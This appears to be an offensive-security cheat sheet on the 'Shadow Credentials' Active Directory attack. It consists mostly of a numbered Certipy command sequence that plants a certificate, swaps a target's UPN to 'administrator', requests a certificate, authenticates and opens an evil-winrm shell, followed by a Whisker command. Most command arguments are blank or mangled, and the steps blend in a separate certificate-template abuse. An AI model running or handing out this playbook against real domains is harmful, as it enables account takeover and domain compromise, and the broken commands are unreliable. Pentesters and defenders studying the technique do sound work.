# Shadow Credentials
Shadow Credentials is an attack technique to take over Active Directory user/computer account by compromising msDS-KeyCredentialLink property of target objects.
### Exploit
If the attacker can modify the target object's (user or computer account) attribute `msDS-KeyCredentialLink` and append it with alternate credentials in the form of certificates, he takes over the account in AD.
#### Using Certipy
```
# 1. Add a shadow certificate for the target user account
certipy shadow auto -u @ -hashes -account
# 2. Update the target account's UPN (User Principal Name) to "administrator"
certipy account update -u @ -hashes -user -upn administrator
# (Option) Find vulnerable template (check values for 'Template Name' and 'Certificate Authorities'. They will be used for the later commands)
certipy find -u @ -hashes -stdout -vulnerable
# 3. Request a certificate for the target account using a vulnerable CA template
certipy req -u @ -hashes -ca -template
# 4. Restore the target account's UPN to its original value
certipy account update -u @ -hashes user -upn @
# 5. Authenticate as the administrator using the obtained PFX certificate
certipy auth -pfx administrator.pfx -domain "example.local"
# 6. Establish a remote WinRM session as the administrator using their NTLM hash
evil-winrm -i -u administrator -H
```
#### Using Whisker
[Whisker](https://github.com/eladshamir/Whisker) is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute.
```
Whisker.exe add /target:john /domain:example.local
```
### References
* [Red Team Notes](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials)